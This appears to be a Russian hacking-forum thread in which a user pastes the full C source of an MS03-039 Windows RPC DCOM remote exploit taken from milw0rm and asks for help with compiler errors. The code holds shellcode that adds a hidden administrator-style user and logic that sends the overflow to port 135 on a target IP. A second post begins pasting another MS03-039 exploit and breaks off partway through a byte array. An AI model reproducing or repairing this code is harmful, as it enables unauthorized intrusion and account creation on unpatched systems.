не могу скомпилить сплоит :(

Discussion in 'Безопасность и Анонимность' started by $ereg@, 4 Mar 2009.

  1. $ereg@

    в общем, надо скомпилить сплоит ms03-039
    взял с милворма сначала этот:

    ---------------------------------------------------------------------
    /*
    RPCDCOM2.c ver1.1
    copy by FLASHSKY flashsky at xfocus.org 2003.9.14
    */
    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>

    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x68,0x00
    ,0x00,0x00,0x0E,0x00,0xFF,0xFF,0x68,0x8B,0x0B,0x00,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00};

    unsigned char request2[]={
    0x20,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x5C,0x00,0x5C,0x00};

    unsigned char request3[]={
    0x46,0x00,0x43,0x00,0x24,0x00,0x46,0x00,
    0x31,0x00,0x32,0x00,0x33,0x00,0x34,0x00,0x35,0x00
    ,0x36,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00,0x31,0x00
    ,0x2E,0x00,0x64,0x00,0x6F,0x00,0x63,0x00,0x00,0x00};



    unsigned char sccnsp3sp4[]=
    "\x6C\x00\x6F\x00\x63\x00\x61\x00\x6C\x00\x68\x00"
    "\x6F\x00\x73\x00\x74\x00\x5C\x00\x43\x00\x24\x00\x5C\x00"

    "\x58\x00\xeb\x3c\x46\x00\x46\x00\xeb\x7c\x46\x00\x46\x00\x38\x6e"
    "\xeb\x02\xeb\x05\xe8\xf9\xff\xff\xff\x58\x83\xc0\x1b\x8d\xa0\x01"
    "\xeb\x1e\xff\x83\xe4\xfc\x8b\xec\x33\xc9\x66\xb9\x99\x01\x80\x30"
    "\xf6\xe0\xe0\x93\xdf\xfc\xf2\xf7\xeb\x06\xf1\xe1\xf2\xe1\xea\xd2"

    //SHELLCODE From SAM ,THANKs !
    //Add user SST,password is 557,
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x4D\x01\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"

    "\x70\xDA\x98\x99\x99\xCC\x12\x75\x18\x75\x19\x99\x99\x99\x12\x6D"
    "\x71\x92\x98\x99\x99\x10\x9F\x66\xAF\xF1\x01\x67\x13\x97\x71\x3C"
    "\x99\x99\x99\x10\xDF\x95\x66\xAF\xF1\xE7\x41\x7B\xEA\x71\x0F\x99"
    "\x99\x99\x10\xDF\x89\xFD\x38\x81\x99\x99\x99\x12\xD9\xA9\x14\xD9"
    "\x81\x22\x99\x99\x8E\x99\x10\x81\xAA\x59\xC9\xF3\xFD\xF1\xB9\xB6"
    "\xF8\xFD\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED"
    "\xB9\x12\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xB9\xAC\xAC\xAE"
    "\xF1\xB9\xEA\xEA\xED\xF1\xEC\xEA\xFC\xEB\xF1\xF7\xFC\xED\xB9\x12"
    "\x55\xC9\xC8\x66\xCF\x95\xAA\x59\xC9\xF1\xFD\xFD\x99\x99\xF1\xED"
    "\xB9\xB6\xF8\xF1\xEA\xB9\xEA\xEA\xF1\xF8\xED\xF6\xEB\xF1\xF0\xEA"
    "\xED\xEB\xF1\xFD\xF4\xF0\xF7\xF1\xEC\xE9\xB9\xF8\xF1\xF5\xFE\xEB"
    "\xF6\xF1\xF5\xF6\xFA\xF8\xF1\xF7\xFC\xED\xB9\x12\x55\xC9\xC8\x66"
    "\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12\xF5\xBD\x81"
    "\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12\xC3\xB9\x9A"
    "\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA\x59\x35\xA3"
    "\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD\x8D\xEC\x78"
    "\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
    "\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2\x5B\x9D\x99"
    "\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12\xD9\x95\x12"
    "\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31\x21\x99\x99"
    "\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\x21\x67\x66\x66"

    "\x6e\x60\x38\xcc\x54\xd6\x93\xd7\x93\x93\x93\x1a\xce\xaf\x1a\xce"
    "\xab\x1a\xce\xd3\x54\xd6\xbf\x92\x92\x93\x93\x1e\xd6\xd7\xc3\xc6"
    "\xc2\xc2\xc2\xd2\xc2\xda\xc2\xc2\xc5\xc2\x6c\xc4\x77\x6c\xe6\xd7"
    "\x6c\xc4\x7b\x6c\xe6\xdb\x6c\xc4\x7b\xc0\x6c\xc4\x6b\xc3\x6c\xc4"
    "\x7f\x19\x95\xd5\x17\x53\xe6\x6a"
    "\xc2\xc1\xc5\xc0\x6c\x41\xc9\xca"
    "\x1a\x94\xd4\xd4\xd4\xd4\x71\x7a\x50\x90\x90\x90" //
    "\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x77\xe0\x43\x00\x00\x10\x5c\x00"
    "\xeb\x1e\x01\x00"// FOR CN SP3/SP4+-MS03-26
    "\x4C\x14\xec\x77"// TOP SEH FOR cn w2k+SP4,must modify to SEH of your target's os


    //FILL BYTE,so sizeof(UNC)>0X400(0X80*8),why? You can read more form my artic
    //"Utilization of released heap structure and exploit of universal Heap overflow in windows ".
    "\xEB\x10\x5A\x4A\x33\xC9\x66\xB9\x90\x02\x80\x34\x0A\x99\xE2\xFA"
    "\xEB\x05\xE8\xEB\xFF\xFF\xFF"
    "\xC7\x5F\x9D\xBD\xDD\x14\xDD\xBD\xDD\xC9\x14\xDD\xBD\x9D\xC9\x14"
    "\x1D\xBD\x1D\x99\x99\x99\xC9\x14\x1D\xBD\x0D\x99\x99\x99\xC9\xAA"
    "\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\x2D\x99\x99\x99\xC9\x66\xCF"
    "\x95\x14\xD5\xBD\xDD\x14\x8D\xBD\xAA\x59\xC9\xF1\xAC\x99\xAE\x99"
    "\xF1\xB9\x99\xAC\x99\xF1\xEA\x99\xED\x99\xF1\xB9\x99\xEA\x99\xF1"
    "\xFC\x99\xEB\x99\xF1\xEC\x99\xEA\x99\xF1\xED\x99\xB9\x99\xF1\xF7"
    "\x99\xFC\x99\x12\x45\xC8\xCB\xC8\xCB\x14\x1D\xBD\x29\x99\x99\x99"
    "\xC9\x14\x1D\xBD\x59\x99\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA"
    "\x14\x1D\xBD\x79\x99\x99\x99\xC9\x66\xCF\x95\xC3\xC0\xAA\x59\xC9"
    "\xF1\xFD\x99\xFD\x99\xF1\xB6\x99\xF8\x99\xF1\xED\x99\xB9\x99\xF1"
    "\xEA\x99\xEA\x99\xF1\xEA\x99\xB9\x99\xF1\xF6\x99\xEB\x99\xF1\xF8"
    "\x99\xED\x99\xF1\xED\x99\xEB\x99\xF1\xF0\x99\xEA\x99\xF1\xF0\x99"
    "\xF7\x99\xF1\xFD\x99\xF4\x99\xF1\xB9\x99\xF8\x99\xF1\xEC\x99\xE9"
    "\x99\xF1\xEB\x99\xF6\x99\xF1\xF5\x99\xFE\x99\xF1\xFA\x99\xF8\x99"
    "\xF1\xF5\x99\xF6\x99\xF1\xED\x99\xB9\x99\xF1\xF7\x99\xFC\x99\x12"
    "\x45\xC8\xCB\x14\x1D\xBD\x61\x99\x99\x99\xC9\x14\x1D\xBD\x91\x98"
    "\x99\x99\xC9\xAA\x59\xC9\xC9\xC9\xC9\xCA\x14\x1D\xBD\xB1\x98\x99"
    "\x99\xC9\x66\xCF\x95\xAA\x59\xC9\x66\xCF\x89\xCA\xCC\xCF\xCE\x12"
    "\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81\x12"
    "\xC3\xB9\x9A\x44\x7A\xAB\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65\xAA"
    "\x59\x35\xA3\x5D\xED\x9E\x58\x56\x94\x9A\x61\x72\x6B\xA2\xE5\xBD"
    "\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A"
    "\x44\x12\x9D\x12\x9A\x5C\x72\x9B\xAA\x59\x12\x4C\xC6\xC7\xC4\xC2"
    "\x5B\x9D\x99\xCC\xCF\xFD\x38\xA9\x99\x99\x99\x1C\x59\xE1\x95\x12"
    "\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x72\x90\x12\xD9\xAD\x12\x31"
    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71\xEC\x64\x66\x66"

    "\x04\x04\x00\x70\x00\x04\x40"
    "\x00\x10\x5c\x00\x78\x01\x07\x00\x78\x01\x07\x00\xa0\x04\x00"

    "\x21\x99\x99\x99\x12\x5C\xC7\xC4\x5B\x9D\x99\x71";


    unsigned char request4[]={
    0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x20,0x00,0x00,0x00,0x30,0x00,0x2D,0x00,0x00,0x00
    ,0x00,0x00,0x88,0x2A,0x0C,0x00,0x02,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x28,0x8C
    ,0x0C,0x00,0x01,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    };

    void main(int argc,char ** argv)
    {
    WSADATA WSAData;
    SOCKET sock;
    int len,len1;
    SOCKADDR_IN addr_in;
    short port=135;
    unsigned char buf1[0x1000];
    unsigned char buf2[0x1000];

    printf("RPC DCOM overflow Vulnerability discoveried by NSFOCUS\n");
    printf("Code by FlashSky,Flashsky xfocus org\n");
    printf("Welcome to our Site: http://www.xfocus.org\n");
    printf("Welcome to our Site: http://www.venustech.com.cn\n");
    if(argc!=2)
    {
    printf("%s targetIP \n",argv[0]);
    printf("for cn w2k server sp3/sp4+ms03-26\n");
    }

    if (WSAStartup(MAKEWORD(2,0),&WSAData)!=0)
    {
    printf("WSAStartup error.Error:%d\n",WSAGetLastError());
    return;
    }

    addr_in.sin_family=AF_INET;
    addr_in.sin_port=htons(port);
    addr_in.sin_addr.S_un.S_addr=inet_addr(argv[1]);

    if ((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)
    {
    printf("Socket failed.Error:%d\n",WSAGetLastError());
    return;
    }
    len1=sizeof(request1);
    len=sizeof(sccnsp3sp4);

    if(WSAConnect(sock,(struct sockaddr *)&addr_in,sizeof(addr_in),NULL,NULL,NULL,NULL)==SOCKET_ERROR)
    {
    printf("Connect failed.Error:%d",WSAGetLastError());
    return;
    }
    memcpy(buf2,request1,sizeof(request1));
    *(DWORD *)(request2)=*(DWORD *)(request2)+sizeof(sccnsp3sp4)/2;
    *(DWORD *)(request2+8)=*(DWORD *)(request2+8)+sizeof(sccnsp3sp4)/2;
    memcpy(buf2+len1,request2,sizeof(request2));
    len1=len1+sizeof(request2);
    memcpy(buf2+len1,sccnsp3sp4,sizeof(sccnsp3sp4));
    len1=len1+sizeof(sccnsp3sp4);
    memcpy(buf2+len1,request3,sizeof(request3));
    len1=len1+sizeof(request3);
    memcpy(buf2+len1,request4,sizeof(request4));
    len1=len1+sizeof(request4);
    *(DWORD *)(buf2+8)=*(DWORD *)(buf2+8)+len-0xc;

    *(DWORD *)(buf2+0x10)=*(DWORD *)(buf2+0x10)+len-0xc;
    *(DWORD *)(buf2+0x80)=*(DWORD *)(buf2+0x80)+len-0xc;
    *(DWORD *)(buf2+0x84)=*(DWORD *)(buf2+0x84)+len-0xc;
    *(DWORD *)(buf2+0xb4)=*(DWORD *)(buf2+0xb4)+len-0xc;
    *(DWORD *)(buf2+0xb8)=*(DWORD *)(buf2+0xb8)+len-0xc;
    *(DWORD *)(buf2+0xd0)=*(DWORD *)(buf2+0xd0)+len-0xc;
    *(DWORD *)(buf2+0x18c)=*(DWORD *)(buf2+0x18c)+len-0xc;
    if (send(sock,bindstr,sizeof(bindstr),0)==SOCKET_ERROR)
    {
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return;
    }

    len=recv(sock,buf1,1000,NULL);
    if (send(sock,buf2,len1,0)==SOCKET_ERROR)
    {
    printf("Send failed.Error:%d\n",WSAGetLastError());
    return;
    }
    // len=recv(sock,buf1,1024,NULL);
    }

    /*

    */

    // milw0rm.com [2003-09-20]
    ---------------------------------------------------------------------
    компилятор мне вот чё выдал:
    error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [72]' to 'const char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
    error C2664: 'recv' : cannot convert parameter 2 from 'unsigned char [4096]' to 'char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
    error C2664: 'send' : cannot convert parameter 2 from 'unsigned char [4096]' to 'const char *'
    Types pointed to are unrelated; conversion requires reinterpret_cast, C-style cast or function-style cast
    исправить я не смог :(
    потом попробовал скомпилить этот сплоит (тоже с милворма):
     
  2. $ereg@

    ----------------------------------------------
    /* Windows RPC2 Universal Exploit (MS03-039) & Remote DoS (RPC3) */
    /* Must be used with the associated shell */
    /* */
    /* This exploit works against unpatched systems (MS03-039) */
    /* And cause a Denial of Service on patched systems (rpc3) */


    #include <stdio.h>
    #include <winsock2.h>
    #include <windows.h>
    #include <process.h>
    #include <string.h>
    #include <winbase.h>

    FILE *fp1;
    unsigned char bindstr[]={
    0x05,0x00,0x0B,0x03,0x10,0x00,0x00,0x00,0x48,0x00,0x00,0x00,0x7F,0x00,0x00,0x00,
    0xD0,0x16,0xD0,0x16,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x00,0x01,0x00,
    0xa0,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,
    0x04,0x5D,0x88,0x8A,0xEB,0x1C,0xC9,0x11,0x9F,0xE8,0x08,0x00,
    0x2B,0x10,0x48,0x60,0x02,0x00,0x00,0x00};

    unsigned char request1[]={
    0x05,0x00,0x00,0x03,0x10,0x00,0x00,0x00,0xE8,0x03
    ,0x00,0x00,0xE5,0x00,0x00,0x00,0xD0,0x03,0x00,0x00,0x01,0x00,0x04,0x00,0x05,0x00
    ,0x06,0x00,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x32,0x24,0x58,0xFD,0xCC,0x45
    ,0x64,0x49,0xB0,0x70,0xDD,0xAE,0x74,0x2C,0x96,0xD2,0x60,0x5E,0x0D,0x00,0x01,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x70,0x5E,0x0D,0x00,0x02,0x00,0x00,0x00,0x7C,0x5E
    ,0x0D,0x00,0x00,0x00,0x00,0x00,0x10,0x00,0x00,0x00,0x80,0x96,0xF1,0xF1,0x2A,0x4D
    ,0xCE,0x11,0xA6,0x6A,0x00,0x20,0xAF,0x6E,0x72,0xF4,0x0C,0x00,0x00,0x00,0x4D,0x41
    ,0x52,0x42,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00
    ,0x00,0x00,0xA8,0xF4,0x0B,0x00,0x60,0x03,0x00,0x00,0x60,0x03,0x00,0x00,0x4D,0x45
    ,0x4F,0x57,0x04,0x00,0x00,0x00,0xA2,0x01,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x38,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00,0x00,0x00,0x30,0x03,0x00,0x00,0x28,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0xC8,0x00
    ,0x00,0x00,0x4D,0x45,0x4F,0x57,0x28,0x03,0x00,0x00,0xD8,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x02,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC4,0x28,0xCD,0x00,0x64,0x29
    ,0xCD,0x00,0x00,0x00,0x00,0x00,0x07,0x00,0x00,0x00,0xB9,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAB,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA5,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA6,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xA4,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAD,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0xAA,0x01,0x00,0x00,0x00,0x00
    ,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x07,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x58,0x00,0x00,0x00,0x90,0x00,0x00,0x00,0x40,0x00,0x00,0x00,0x20,0x00
    ,0x00,0x00,0x78,0x00,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x50,0x00,0x00,0x00,0x4F,0xB6,0x88,0x20,0xFF,0xFF
    ,0xFF,0xFF,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x10
    ,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x48,0x00,0x00,0x00,0x07,0x00,0x66,0x00,0x06,0x09
    ,0x02,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x10,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x78,0x19,0x0C,0x00,0x58,0x00,0x00,0x00,0x05,0x00,0x06,0x00,0x01,0x00
    ,0x00,0x00,0x70,0xD8,0x98,0x93,0x98,0x4F,0xD2,0x11,0xA9,0x3D,0xBE,0x57,0xB2,0x00
    ,0x00,0x00,0x32,0x00,0x31,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x80,0x00
    ,0x00,0x00,0x0D,0xF0,0xAD,0xBA,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x18,0x43,0x14,0x00,0x00,0x00,0x00,0x00,0x60,0x00
    ,0x00,0x00,0x60,0x00,0x00,0x00,0x4D,0x45,0x4F,0x57,0x04,0x00,0x00,0x00,0xC0,0x01
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x3B,0x03
    ,0x00,0x00,0x00,0x00,0x00,0x00,0xC0,0x00,0x00,0x00,0x00,0x00,0x00,0x46,0x00,0x00
    ,0x00,0x00,0x30,0x00,0x00,0x00,0x01,0x00,0x01,0x00,0x81,0xC5,0x17,0x03,0x80,0x0E
    ,0xE9,0x4A,0x99,0x99,0xF1,0x8A,0x50,0x6F,0x7A,0x85,0x02,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x01,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x30,0x00
    ,0x00,0x00,0x78,0x00,0x6E,0x00,0x00,0x00,0x00,0x00,0xD8,0xDA,0x0D,0x00,0x00,0x00
    ,0x00,0x00,0x00,0x00,0x00,0x00,0x20,0x2F,0x0C,0x00,0x00,0x00,0x00,0x00,0x00,0x00
    ,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x46,0x00
    ,0x58,0x00,0x00,0x00,0x00,0x00,0x01,0x10,0x08,0x00,0xCC,0xCC,0xCC,0xCC,0x10,0x00
    ,0x00,0x00,0x30,0x00,0x2E,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
